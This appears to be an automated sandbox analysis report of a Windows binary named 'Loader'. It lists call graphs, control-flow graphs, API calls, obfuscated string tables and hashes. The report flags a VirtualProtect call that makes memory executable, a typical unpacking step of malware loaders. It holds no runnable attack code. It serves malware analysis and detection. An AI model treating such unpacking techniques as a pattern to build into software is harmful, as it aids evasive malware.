38864->38846 38866 1a5289 38866->38849 38900 1aa596 38867->38900 38874 1aa4ab 38927 1aa691 38874->38927 38875 1aa49d 38938 1a331f 14 API calls __dosmaperr 38875->38938 38878 1aa484 38878->38834 38880 1aa4e3 38939 19d4a9 14 API calls __dosmaperr 38880->38939 38882 1aa4e8 38940 1a331f 14 API calls __dosmaperr 38882->38940 38883 1aa52a 38889 1aa573 38883->38889 38942 1aa0b3 43 API calls 2 library calls 38883->38942 38885 1aa4fe 38885->38883 38941 1a331f 14 API calls __dosmaperr 38885->38941 38943 1a331f 14 API calls __dosmaperr 38889->38943 38890->38844 38891->38843 38892->38850 38893->38856 38894->38864 38895->38857 38896->38856 38897->38863 38898->38866 38901 1aa5a2 ___scrt_is_nonwritable_in_current_image 38900->38901 38903 1aa5bc 38901->38903 38944 19d4fd EnterCriticalSection 38901->38944 38904 1aa46b 38903->38904 38947 19fa2c 43 API calls __InternalCxxFrameHandler 38903->38947 38911 1aa1c1 38904->38911 38908 1aa5cc 38910 1aa5f8 38908->38910 38945 1a331f 14 API calls __dosmaperr 38908->38945 38946 1aa615 LeaveCriticalSection std::_Lockit::~_Lockit 38910->38946 38948 19fa70 38911->38948 38913 1aa1d3 38914 1aa1e2 GetOEMCP 38913->38914 38915 1aa1f4 38913->38915 38916 1aa20b 38914->38916 38915->38916 38917 1aa1f9 GetACP 38915->38917 38916->38878 38918 1a3d44 38916->38918 38917->38916 38919 1a3d82 38918->38919 38920 1a3d52 38918->38920 38959 19d4a9 14 API calls __dosmaperr 38919->38959 38921 1a3d6d HeapAlloc 38920->38921 38925 1a3d56 __Getctype 38920->38925 38923 1a3d80 38921->38923 38921->38925 38924 1a3d87 38923->38924 38924->38874 38924->38875 38925->38919 38925->38921 38958 1a02d3 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 38925->38958 38928 1aa1c1 45 API calls 38927->38928 38929 1aa6b1 38928->38929 38931 1aa6ee IsValidCodePage 38929->38931 38936 1aa72a __fread_nolock 38929->38936 38930 196865 __ehhandler$?_RunAndWait@_StructuredTaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 38932 1aa4d8 38930->38932 38933 1aa700 38931->38933 38931->38936 38932->38880 38932->38885 38934 1aa72f GetCPInfo 38933->38934 38937 1aa709 __fread_nolock 38933->38937 38934->38936 38934->38937 38936->38930 38960 1aa295 38937->38960 38938->38878 38939->38882 38940->38878 38941->38883 38942->38889 38943->38878 38944->38908 38945->38910 38946->38903 38949 19fa8e 38948->38949 38955 1a5145 43 API calls 3 library calls 38949->38955 38951 19faaf 38956 1a3d92 43 API calls __Getctype 38951->38956 38953 19fac5 38957 1a3df0 43 API calls _Fputc 38953->38957 38955->38951 38956->38953 38958->38925 38959->38924 38961 1aa2bd GetCPInfo 38960->38961 38970 1aa386 38960->38970 38966 1aa2d5 38961->38966 38961->38970 38963 196865 __ehhandler$?_RunAndWait@_StructuredTaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 38964 1aa43f 38963->38964 38964->38936 38971 1a862c 38966->38971 38969 1a8923 48 API calls 38969->38970 38970->38963 38972 19fa70 std::_Locinfo::_Locinfo_ctor 43 API calls 38971->38972 38973 1a864c 38972->38973 38991 1a9799 38973->38991 38975 1a8708 38994 196847 14 API calls std::_Locinfo::~_Locinfo 38975->38994 38976 1a8679 38976->38975 38979 1a3d44 std::_Locinfo::_Locinfo_ctor 15 API calls 38976->38979 38981 1a8710 38976->38981 38982 1a869e __fread_nolock std::_Locinfo::_Locinfo_ctor 38976->38982 38977 196865 __ehhandler$?_RunAndWait@_StructuredTaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 38980 1a8733 38977->38980 38979->38982 38986 1a8923 38980->38986 38981->38977 38982->38975 38983 1a9799 __fread_nolock MultiByteToWideChar 38982->38983 38984 1a86e9 38983->38984 38984->38975 38985 1a86f4 GetStringTypeW 38984->38985 38985->38975 38987 19fa70 std::_Locinfo::_Locinfo_ctor 43 API calls 38986->38987 38988 1a8936 38987->38988 38995 1a8735 38988->38995 38992 1a97aa MultiByteToWideChar 38991->38992 38992->38976 38994->38981 38996 1a8750 38995->38996 38997 1a9799 __fread_nolock MultiByteToWideChar 38996->38997 39002 1a8796 38997->39002 38998 1a890e 38999 196865 __ehhandler$?_RunAndWait@_StructuredTaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 38998->38999 39001 1a8921 38999->39001 39000 1a8842 39035 196847 14 API calls std::_Locinfo::~_Locinfo 39000->39035 39001->38969 39002->38998 39002->39000 39003 1a3d44 std::_Locinfo::_Locinfo_ctor 15 API calls 39002->39003 39005 1a87bc std::_Locinfo::_Locinfo_ctor 39002->39005 39003->39005 39005->39000 39006 1a9799 __fread_nolock MultiByteToWideChar 39005->39006 39007 1a8801 39006->39007 39007->39000 39023 1a394d 39007->39023 39010 1a886b 39012 1a88f6 39010->39012 39013 1a887d std::_Locinfo::_Locinfo_ctor 39010->39013 39015 1a3d44 std::_Locinfo::_Locinfo_ctor 15 API calls 39010->39015 39011 1a8833 39011->39000 39014 1a394d std::_Locinfo::_Locinfo_ctor 7 API calls 39011->39014 39034 196847 14 API calls std::_Locinfo::~_Locinfo 39012->39034 39013->39012 39017 1a394d std::_Locinfo::_Locinfo_ctor 7 API calls 39013->39017 39014->39000 39015->39013 39018 1a88c0 39017->39018 39018->39012 39032 1a9815 WideCharToMultiByte 39018->39032 39020 1a88da 39020->39012 39021 1a88e3 39020->39021 39033 196847 14 API calls std::_Locinfo::~_Locinfo 39021->39033 39036 1a34fb 39023->39036 39026 1a395e LCMapStringEx 39031 1a39a5 39026->39031 39027 1a3985 39039 1a39aa 5 API calls std::_Locinfo::_Locinfo_ctor 39027->39039 39030 1a399e LCMapStringW 39030->39031 39031->39000 39031->39010 39031->39011 39032->39020 39033->39000 39034->39000 39035->38998 39040 1a35fa 39036->39040 39039->39030 39041 1a3628 39040->39041 39044 1a3511 39040->39044 39041->39044 39047 1a352f LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary ___vcrt_FlsSetValue 39041->39047 39043 1a363c 39043->39044 39045 1a3642 GetProcAddress 39043->39045 39044->39026 39044->39027 39045->39044 39046 1a3652 std::_Locinfo::_Locinfo_ctor 39045->39046 39046->39044 39047->39043

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00192348: _strlen.LIBCMT ref: 00192360
                                                                                                                      • _strlen.LIBCMT ref: 0019220C
                                                                                                                      • VirtualProtect.KERNELBASE(00213F00,000004E4,00000040,?,001BAABC,00000000,IOanz UZA891nNAIUsy U(Ahy8*! ), ref: 00192265
                                                                                                                        • Part of subcall function 00192813: __EH_prolog3_catch.LIBCMT ref: 0019281A
                                                                                                                        • Part of subcall function 00192813: _strlen.LIBCMT ref: 00192832
                                                                                                                        • Part of subcall function 001930F8: __EH_prolog3_catch.LIBCMT ref: 001930FF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _strlen$H_prolog3_catch$ProtectVirtual
                                                                                                                      • String ID: IOanz UZA891nNAIUsy U(Ahy8*! $MZx
                                                                                                                      • API String ID: 2874085908-2632814837
                                                                                                                      • Opcode ID: ecbaa23c4db6450f699b62d02e58978f41336b99e5133eaf00ba5a83ec95a6ad
                                                                                                                      • Instruction ID: 57d569b21860d8796475f83c389c03190035b3b0fc40c7b279c1c19f2fe485ee
                                                                                                                      • Opcode Fuzzy Hash: ecbaa23c4db6450f699b62d02e58978f41336b99e5133eaf00ba5a83ec95a6ad
                                                                                                                      • Instruction Fuzzy Hash: 6F419071D04208BFDF04EBA4E955BEEB7F5EB58310F20442AF405A7281DB74AE45CB65

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 36 1a8735-1a874e 37 1a8750-1a8760 call 1a02a8 36->37 38 1a8764-1a8769 36->38 37->38 44 1a8762 37->44 40 1a876b-1a8775 38->40 41 1a8778-1a879e call 1a9799 38->41 40->41 46 1a8911-1a8922 call 196865 41->46 47 1a87a4-1a87af 41->47 44->38 49 1a8904 47->49 50 1a87b5-1a87ba 47->50 51 1a8906 49->51 53 1a87cf-1a87da call 1a3d44 50->53 54 1a87bc-1a87c5 call 196e40 50->54 56 1a8908-1a890f call 196847 51->56 61 1a87dc 53->61 62 1a87e5-1a87e9 53->62 54->62 64 1a87c7-1a87cd 54->64 56->46 65 1a87e2 61->65 62->51 66 1a87ef-1a8806 call 1a9799 62->66 64->65 65->62 66->51 69 1a880c-1a881e call 1a394d 66->69 71 1a8823-1a8827 69->71 72 1a8829-1a8831 71->72 73 1a8842-1a8844 71->73 74 1a886b-1a8877 72->74 75 1a8833-1a8838 72->75 73->51 76 1a8879-1a887b 74->76 77 1a88f6 74->77 78 1a88ea-1a88ec 75->78 79 1a883e-1a8840 75->79 80 1a887d-1a8886 call 196e40 76->80 81 1a8890-1a889b call 1a3d44 76->81 82 1a88f8-1a88ff call 196847 77->82 78->56 79->73 83 1a8849-1a8863 call 1a394d 79->83 80->82 93 1a8888-1a888e 80->93 81->82 94 1a889d 81->94 82->73 83->78 92 1a8869 83->92 92->73 95 1a88a3-1a88a8 93->95 94->95 95->82 96 1a88aa-1a88c2 call 1a394d 95->96 96->82 99 1a88c4-1a88cb 96->99 100 1a88ee-1a88f4 99->100 101 1a88cd-1a88ce 99->101 102 1a88cf-1a88e1 call 1a9815 100->102 101->102 102->82 105 1a88e3-1a88e9 call 196847 102->105 105->78
                                                                                                                      APIs
                                                                                                                      • __freea.LIBCMT ref: 001A88E4
                                                                                                                        • Part of subcall function 001A3D44: HeapAlloc.KERNEL32(00000000,00000000,?,?,00197815,?,?,?,?,?,001911CC,?,00000001), ref: 001A3D76
                                                                                                                      • __freea.LIBCMT ref: 001A88F9
                                                                                                                      • __freea.LIBCMT ref: 001A8909
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __freea$AllocHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 85559729-0
                                                                                                                      • Opcode ID: 9a8ea7a263cd98f45c7e3891b96ea2eb1d9e1b851ca706228a9648df060871d8
                                                                                                                      • Instruction ID: 3170bca4503e1dafb3881ae0c60e62e8b02a38bcf934be1931c0f69a8df73697
                                                                                                                      • Opcode Fuzzy Hash: 9a8ea7a263cd98f45c7e3891b96ea2eb1d9e1b851ca706228a9648df060871d8
                                                                                                                      • Instruction Fuzzy Hash: 4051E4BA60020AAFEF259FA4CC81EBB3AA9EF56754B650128FD14E7141EF74CD508760

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 108 1aa691-1aa6b9 call 1aa1c1 111 1aa6bf-1aa6c5 108->111 112 1aa881-1aa882 call 1aa232 108->112 114 1aa6c8-1aa6ce 111->114 115 1aa887-1aa889 112->115 116 1aa7d0-1aa7ef call 198410 114->116 117 1aa6d4-1aa6e0 114->117 119 1aa88a-1aa898 call 196865 115->119 125 1aa7f2-1aa7f7 116->125 117->114 120 1aa6e2-1aa6e8 117->120 123 1aa7c8-1aa7cb 120->123 124 1aa6ee-1aa6fa IsValidCodePage 120->124 123->119 124->123 127 1aa700-1aa707 124->127 128 1aa7f9-1aa7fe 125->128 129 1aa834-1aa83e 125->129 130 1aa709-1aa715 127->130 131 1aa72f-1aa73c GetCPInfo 127->131 132 1aa800-1aa808 128->132 133 1aa831 128->133 129->125 134 1aa840-1aa86a call 1aa183 129->134 135 1aa719-1aa725 call 1aa295 130->135 136 1aa73e-1aa75d call 198410 131->136 137 1aa7bc-1aa7c2 131->137 139 1aa80a-1aa80d 132->139 140 1aa829-1aa82f 132->140 133->129 149 1aa86b-1aa87a 134->149 146 1aa72a 135->146 136->135 147 1aa75f-1aa766 136->147 137->112 137->123 144 1aa80f-1aa815 139->144 140->128 140->133 144->140 148 1aa817-1aa827 144->148 146->115 150 1aa768-1aa76d 147->150 151 1aa792-1aa795 147->151 148->140 148->144 149->149 152 1aa87c 149->152 150->151 153 1aa76f-1aa777 150->153 154 1aa79a-1aa7a1 151->154 152->112 155 1aa78a-1aa790 153->155 156 1aa779-1aa780 153->156 154->154 157 1aa7a3-1aa7b7 call 1aa183 154->157 155->150 155->151 158 1aa781-1aa788 156->158 157->135 158->155 158->158
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 001AA1C1: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 001AA1EC
                                                                                                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,001AA4D8,?,00000000,?,?,?), ref: 001AA6F2
                                                                                                                      • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,001AA4D8,?,00000000,?,?,?), ref: 001AA734
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CodeInfoPageValid
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 546120528-0
                                                                                                                      • Opcode ID: 18b8e371ca3167e4d178504d1b27081a7bc91f5c8ba15b8ddb54f87fa89836f2
                                                                                                                      • Instruction ID: 20a971633a60ad9189a0e9a3801fa72024ddae710468ab8a0171b83b9b3e7efc
                                                                                                                      • Opcode Fuzzy Hash: 18b8e371ca3167e4d178504d1b27081a7bc91f5c8ba15b8ddb54f87fa89836f2
                                                                                                                      • Instruction Fuzzy Hash: B7517538A003459EDB21CF75C8806BBBBF4FF56304F98842ED08287251E77A9946CB92

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 161 1a394d-1a395c call 1a34fb 164 1a395e-1a3983 LCMapStringEx 161->164 165 1a3985-1a399f call 1a39aa LCMapStringW 161->165 169 1a39a5-1a39a7 164->169 165->169
                                                                                                                      APIs
                                                                                                                      • LCMapStringEx.KERNELBASE(?,001A8823,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 001A3981
                                                                                                                      • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,001A8823,?,?,00000000,?,00000000), ref: 001A399F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: String
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2568140703-0
                                                                                                                      • Opcode ID: 0fc7c68c0b21d9eeb7f77aaab30c7f7a06de8c1a37d048997b6e55377f09814d
                                                                                                                      • Instruction ID: ed8a5fcda0c9b90b412e390b4c3ddd1c3d33f85feda56891ce377dab356beaa2
                                                                                                                      • Opcode Fuzzy Hash: 0fc7c68c0b21d9eeb7f77aaab30c7f7a06de8c1a37d048997b6e55377f09814d
                                                                                                                      • Instruction Fuzzy Hash: 59F09D3640015ABBCF136F90DC09EDE3F26FF59764F054210FA2965020C772CA72AB91

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 170 1aa295-1aa2b7 171 1aa2bd-1aa2cf GetCPInfo 170->171 172 1aa3d0-1aa3f6 170->172 171->172 174 1aa2d5-1aa2dc 171->174 173 1aa3fb-1aa400 172->173 176 1aa40a-1aa410 173->176 177 1aa402-1aa408 173->177 175 1aa2de-1aa2e8 174->175 175->175 178 1aa2ea-1aa2fd 175->178 180 1aa41c 176->180 181 1aa412-1aa415 176->181 179 1aa418-1aa41a 177->179 182 1aa31e-1aa320 178->182 183 1aa41e-1aa430 179->183 180->183 181->179 184 1aa2ff-1aa306 182->184 185 1aa322-1aa359 call 1a862c call 1a8923 182->185 183->173 186 1aa432-1aa440 call 196865 183->186 187 1aa315-1aa317 184->187 196 1aa35e-1aa393 call 1a8923 185->196 191 1aa308-1aa30a 187->191 192 1aa319-1aa31c 187->192 191->192 194 1aa30c-1aa314 191->194 192->182 194->187 199 1aa395-1aa39f 196->199 200 1aa3ad-1aa3af 199->200 201 1aa3a1-1aa3ab 199->201 203 1aa3bd 200->203 204 1aa3b1-1aa3bb 200->204 202 1aa3bf-1aa3cc 201->202 202->199 205 1aa3ce 202->205 203->202 204->202 205->186
                                                                                                                      APIs
                                                                                                                      • GetCPInfo.KERNEL32(E8458D00,?,001AA4E4,001AA4D8,00000000), ref: 001AA2C7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Info
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1807457897-0
                                                                                                                      • Opcode ID: fda53950cf6632192d0dbf3ebace21921f3b2a52237724bfd46f01b8a1a8a536
                                                                                                                      • Instruction ID: bd8d5803a1f69a23977a2f71a9b849285747ec5eeb41555172d063f1a2ddc082
                                                                                                                      • Opcode Fuzzy Hash: fda53950cf6632192d0dbf3ebace21921f3b2a52237724bfd46f01b8a1a8a536
                                                                                                                      • Instruction Fuzzy Hash: EF5159755042589ADF218B28CC84AFA7BBCEF5B304F6405ADE49AC7142D371AD46DB21
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %*+($("C$57W3$6~$7ABC$<=>?$DsQX$Ga@J$IJKL$LMNg$SH'T$T$U^_`$YZ[+$_=I?$`abc$akm~$h$h {$mnop$pqrs$q2)$r}$tuv?$uFuS$x$xr$y1D3$z$
                                                                                                                      • API String ID: 0-2038162739
                                                                                                                      • Opcode ID: ec9c880e3599e62d0b092183d6071f06aa7f4272a887b332e50977fd4ac4672f
                                                                                                                      • Instruction ID: 34358094e22847649c4c71759e36f00573108f8d2c462024bde9d6b75c4ecd25
                                                                                                                      • Opcode Fuzzy Hash: ec9c880e3599e62d0b092183d6071f06aa7f4272a887b332e50977fd4ac4672f
                                                                                                                      • Instruction Fuzzy Hash: E0A2CF705083818BD734CF25C8917ABBBE1EFD6304F18892DE5DA9B392D7749906CB92
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %W'U$'[(Y$(S)Q$,o}m$6K;I$J<BJ$W?O=$\+^)$_'[%$o/^-$rY$zkji$|p|~
                                                                                                                      • API String ID: 0-1309467693
                                                                                                                      • Opcode ID: 5800caabe8bf62af63e3602459fe134d559dca4bc094b494e6b20d079e0d1c05
                                                                                                                      • Instruction ID: b7dae458a5a06dd21d1effdc3d54f9508966745fde496629c2529eae71c2ccf8
                                                                                                                      • Opcode Fuzzy Hash: 5800caabe8bf62af63e3602459fe134d559dca4bc094b494e6b20d079e0d1c05
                                                                                                                      • Instruction Fuzzy Hash: E8D1E27150C3908FD318CF24945076BFBE1ABE2714F19893DE9E94B741D779D90A8B82
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $ $!$!$"$"$9$<$>$S$e$~
                                                                                                                      • API String ID: 0-182234891
                                                                                                                      • Opcode ID: a06918ebd65e9151fb0a4498747b54533d6e8a44d64da989032b065c48afe72d
                                                                                                                      • Instruction ID: 2d6f507e0e9fad0d358cf1ebd417230b46556a3369779dc7bfa6200b4b001f93
                                                                                                                      • Opcode Fuzzy Hash: a06918ebd65e9151fb0a4498747b54533d6e8a44d64da989032b065c48afe72d
                                                                                                                      • Instruction Fuzzy Hash: 35B1557391C7E04AD311953C8C8436BAED25BE6224F1E8BADD9E5C73C7D269C8068363
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %$%$%$($($($*$*$*$+$+$+
                                                                                                                      • API String ID: 0-447118901
                                                                                                                      • Opcode ID: 50df7104dc4f15aa91ae1e960bf13180e0c269086872ccad6f8f2714a46e31c9
                                                                                                                      • Instruction ID: 6b5c07a4b9edbaabafde7927052ebc0113ead9e31d7dcb911df3e2f6a2f699d6
                                                                                                                      • Opcode Fuzzy Hash: 50df7104dc4f15aa91ae1e960bf13180e0c269086872ccad6f8f2714a46e31c9
                                                                                                                      • Instruction Fuzzy Hash: 55A147B1E083588FDB04CBA8D4543BD7BA2AF85310F5D842CDA5AA73C2D77D89418B53
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
